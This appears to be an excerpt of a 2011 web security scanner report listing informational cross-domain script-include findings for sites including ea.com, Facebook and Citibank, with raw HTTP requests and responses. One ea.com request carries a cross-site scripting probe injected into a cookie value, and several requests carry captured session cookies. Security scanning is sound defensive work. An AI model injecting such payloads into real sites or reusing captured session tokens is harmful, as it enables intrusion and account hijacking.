<!-- REQUEST ID: TIME=1308926184850:NODE=c2a5301:THREA
...[SNIP]...
<link href="http://store.origin.com" rel="canonical" />

<script src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/ui.core-tabs-common-min.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
</script>


<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ebisuna/cm/multimedia/js/simpleSearchSuggest.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/s_code_remote_v07.js"></script>
...[SNIP]...
19.30. http://videogamevoters.org/eacorp/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://videogamevoters.org
Path:   /eacorp/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /eacorp/?topicId=11341 HTTP/1.1
Host: videogamevoters.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-CheckNode=

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 24 Jun 2011 13:43:43 GMT
Connection: Keep-Alive
Set-Cookie: X-CheckNode=; domain=videogamevoters.org; path=/
Content-Length: 14466


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<title>V
...[SNIP]...
Game Voters Network as they stick up for video gamers' rights. We must make it clear that gamers will continue to stand up for free speech -- and that the numbers are on our side.">


<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
19.31. http://videogamevoters.org/index.php/modal/sc-soon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://videogamevoters.org
Path:   /index.php/modal/sc-soon

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php/modal/sc-soon HTTP/1.1
Host: videogamevoters.org
Proxy-Connection: keep-alive
Referer: http://videogamevoters.org/eacorp/?topicId=11341
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-jljaemke=B82E653654DADA390F78AB527FA85CD6; exp_last_visit=993577424; exp_last_activity=1308937424; exp_tracker=a%3A0%3A%7B%7D; __utmz=27825467.1308923027.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27825467.253868994.1308923027.1308923027.1308923027.1; __utmc=27825467; __utmb=27825467.1.10.1308923027; mw-sc-soon=visited; X-CheckNode=

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Fri, 24 Jun 2011 13:43:47 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: exp_last_activity=1308937427; expires=Sat, 23-Jun-2012 13:43:48 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fmodal%2Fsc-soon%2F%22%3B%7D; path=/
Set-Cookie: X-CheckNode=; domain=videogamevoters.org; path=/
Last-Modified: Fri, 24 Jun 2011 13:43:48 GMT
Content-Length: 4531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<!--/#container-->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
19.32. http://videogamevoters.org/page/s/raiseyourvoice  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://videogamevoters.org
Path:   /page/s/raiseyourvoice

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /page/s/raiseyourvoice HTTP/1.1
Host: videogamevoters.org
Proxy-Connection: keep-alive
Referer: http://videogamevoters.org/eacorp/?topicId=11341
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-jljaemke=B82E653654DADA390F78AB527FA85CD6; exp_last_visit=993577424; __utmz=27825467.1308923027.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27825467.253868994.1308923027.1308923027.1308923027.1; __utmc=27825467; __utmb=27825467.1.10.1308923027; mw-sc-soon=visited; exp_last_activity=1308937427; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fmodal%2Fsc-soon%2F%22%3B%7D; X-CheckNode=

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Fri, 24 Jun 2011 13:44:04 GMT
X-BSD: cached
Set-Cookie: X-CheckNode=; domain=videogamevoters.org; path=/
Content-Length: 16415


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...
<link rel="shortcut icon" type="image/x-icon" href="/page/-/favicon.ico">


        <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
19.33. http://web.sa.mapquest.com/mobil1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.sa.mapquest.com
Path:   /mobil1/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /mobil1/?tempset=search HTTP/1.1
Host: web.sa.mapquest.com
Proxy-Connection: keep-alive
Referer: http://exxon.com/USA-English/GFM/lubricants.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
MIME-Version: 1.0
Date: Fri, 24 Jun 2011 13:32:46 GMT
Server: AOLserver/4.0.10
Content-Type: text/html; charset=iso-8859-1
ntCoent-Length: 39953
Connection: close
Content-Length: 39953


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="description" content="Find Mobil 1 Motor Oil at a Store or Installer" />
   <LINK href="
...[SNIP]...
</table><script type="text/javascript" src="http://www.mobiloil.com/USA-English/MotorOil/Imports/webtrends.js"><!-- Stay Open -->
...[SNIP]...
19.34. http://www.asiawebdirect.com/forms/portal-feedback.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.asiawebdirect.com
Path:   /forms/portal-feedback.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forms/portal-feedback.html?page=http://www.phuket.com/ HTTP/1.1
Host: www.asiawebdirect.com
Proxy-Connection: keep-alive
Referer: http://phuket.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:36 GMT
Server: Apache/2.2.17
Accept-Ranges: bytes
Content-Length: 27786
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
</head>
<body>


<style>
bo
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google.com/recaptcha/api/challenge?k=6LfMWLsSAAAAANcknCaRFHJTvQiScySJg3viacWh">
</script>
...[SNIP]...
19.35. http://www.citibank.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citibank.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
Host: www.citibank.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FD979085078411-600001004008D908[CE]; JSESSIONID=161vTGQPdmpd431rpdvL5QyfyK1Gs0nvqPMfyn3TTMnT8TB1zyyV!-797163621; CP=null*

Response

HTTP/1.1 404 Not found
Server: ""
Date: Fri, 24 Jun 2011 13:28:27 GMT
Content-type: text/html
Connection: close
Content-Length: 14811

<HTML>
<HEAD>
   <style>
   <!--
       body {
           background: #fff;
       }
       .notextdecor{
           COLOR: #000099;
           TEXT-DECORATION: none;
       }
       TD{
           COLOR: #000000;
           FONT-FAMILY: verdana, arial, helvetica, sans
...[SNIP]...
</script>
   <script type="text/javascript" language="javascript" src="http://www.citi.com/domain/scripts/country.js"></script>
   <script type="text/javascript" language="javascript" src="http://www.citi.com/domain/scripts/config.js"></script>
...[SNIP]...
19.36. http://www.ea.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ea.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=103303007.305566496.1308924557.1308924557.1308924557.1; __utmb=103303007.4.10.1308924557; __utmc=103303007; __utmz=103303007.1308924557.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_sivo=US%3AEACOM%3ANONE; s_cc=true; s_ria=flash%20not%20detected%7Csilverlight%20not%20detected; s_pv=NA%3AUS%3AEA%3ANONE%3AMKT%3ANONE%3AEACOM%3ANONE%3A404; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"rid":"1308924564819_872232","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":5,"c":"http://web-static.ea.com/us/portal/js/jquery/100bf\"><script>alert(/XSS/)</script>17b3cdbf2ef","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0,"f":1308924638160}; s_ppv=93; CEM-session=edpobirp4ogcqb3mqgjheosp12

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 14:27:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 33296
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   
   <title>
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="http://web-static.ea.com/atlas/sw-combine/1308169381/6f7f59608e57ea63b42b0b6cbd84b0e7.css?v=1308169381" />
   
   <script type="text/javascript" src="http://use.typekit.com/dum7haf.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
19.37. http://www.ea.com/1/product-eulas  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ea.com
Path:   /1/product-eulas

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /1/product-eulas HTTP/1.1
Host: www.ea.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_pv=no%20value; s_cc=true; evar1=Not%20Logged%20In; s_sq=eacustomerservice%3D%2526pid%253DSupport%252520Home%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%252528openPositionedWindow%252528%252527http%25253A//www.info.ea.com%252527%25252C%25252520%252527info%252527%25252C%25252520780%25252C%25252520800%25252C%252525200%25252C%252525200%25252C%25252520t%2526ot%253DA%26eaeacom%2Ceaproducteacomna%2Ceaeabrandna%2Ceaeacomna%2Ceaproducteacomglobal%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:46:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 116970
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   
   <title>
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="http://web-static.ea.com/atlas/sw-combine/1308169381/518c93ed7595125a5074a21240beed9b.css?v=1308169381" />
   
   <script type="text/javascript" src="http://use.typekit.com/dum7haf.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
19.38. https://www.ea.com/profile/register  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ea.com
Path:   /profile/register

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /profile/register?locale=en_US&surl=http%253A%252F%252Fsupport.ea.com%252Fapp%252Fhome&curl=http%253A%252F%252Fsupport.ea.com%252Fapp%252Fhome&registrationSource=EA-CustomerSupport HTTP/1.1
Host: www.ea.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_pv=no%20value; s_cc=true; evar1=Not%20Logged%20In; s_sq=eaeacom%2Ceaproducteacomna%2Ceaeabrandna%2Ceaeacomna%2Ceaproducteacomglobal%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:44:44 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
P3P: CP="CAO PSA OUR"
Vary: Accept-Encoding
Content-Length: 10092
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<body>
<script type="text/javascript" src="https://a248.e.akamai.net/static.ea.com/profile-assets/js/jquery-1.4.2.js?ver=1.10.0_en_US"></script>
...[SNIP]...
<!-- /regLoginWrap -->
<script type="text/javascript" src="https://a248.e.akamai.net/static.ea.com/profile-assets/js/Framework.js?ver=1.10.0_en_US"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/static.ea.com/profile-assets/js/jquery.checkbox.js?ver=1.10.0_en_US"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/static.ea.com/profile-assets/js/jquery.dynamic-drop.js?ver=1.10.0_en_US"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/static.ea.com/profile-assets/js/jquery.validate-1.7.js?ver=1.10.0_en_US"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://a248.e.akamai.net/static.ea.com/profile-assets/js/signin.js?ver=1.10.0_en_US"></script>
...[SNIP]...
19.39. http://www.facebook.com/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /login.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.addthis.com/bookmark.php?v=250&winname=addthis&pub=asepyanm&source=tbx-250,men-250&lng=en&s=facebook&url=http%3A%2F%2Fbeta.telkom.co.id%2Fproduk-layanan%2F&title=Produk%20dan%20Layanan&ate=AT-asepyanm/-/-/4e048e8a01452adb/4/4dce8a530508b02d&frommenu=1&uid=4dce8a530508b02d&ct=1&pre=http%3A%2F%2Fbeta.telkom.co.id%2Finfo-perusahaan%2F&tt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Jr-eQ; next=http%3A%2F%2Fwww.facebook.com%2Fsharer%2Fsharer.php%3Fu%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%2523.TgSOp6MNlm8.facebook; next_path=%2Fsharer%2Fsharer.php%3Fu%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%2523.TgSOp6MNlm8.facebook

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; expires=Sun, 23-Jun-2013 13:18:36 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.140.126
X-Cnection: close
Date: Fri, 24 Jun 2011 13:18:36 GMT
Content-Length: 17051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/jzQBYnCZYni.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/IIeFDzJo603.js"></script>
...[SNIP]...
19.40. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/like.php?api_key=155079171186702&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df162b01ba%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fphuket.com%2F&layout=standard&locale=en_GB&node_type=link&sdk=joey&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://phuket.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.1.58
X-Cnection: close
Date: Fri, 24 Jun 2011 13:20:38 GMT
Content-Length: 7909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/uBSAkAK-vQA.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/IIeFDzJo603.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/ulcvK428paE.js"></script>
...[SNIP]...
19.41. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.pymnts.com%2Fspil-games-selects-adyens-internet-payment-system-for-global-social-gaming-platform-20110208005240%2F&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=box_count HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.pymnts.com/spil-games-selects-adyens-internet-payment-system-for-global-social-gaming-platform-20110208005240/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.175.63
X-Cnection: close
Date: Fri, 24 Jun 2011 13:30:36 GMT
Content-Length: 4370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
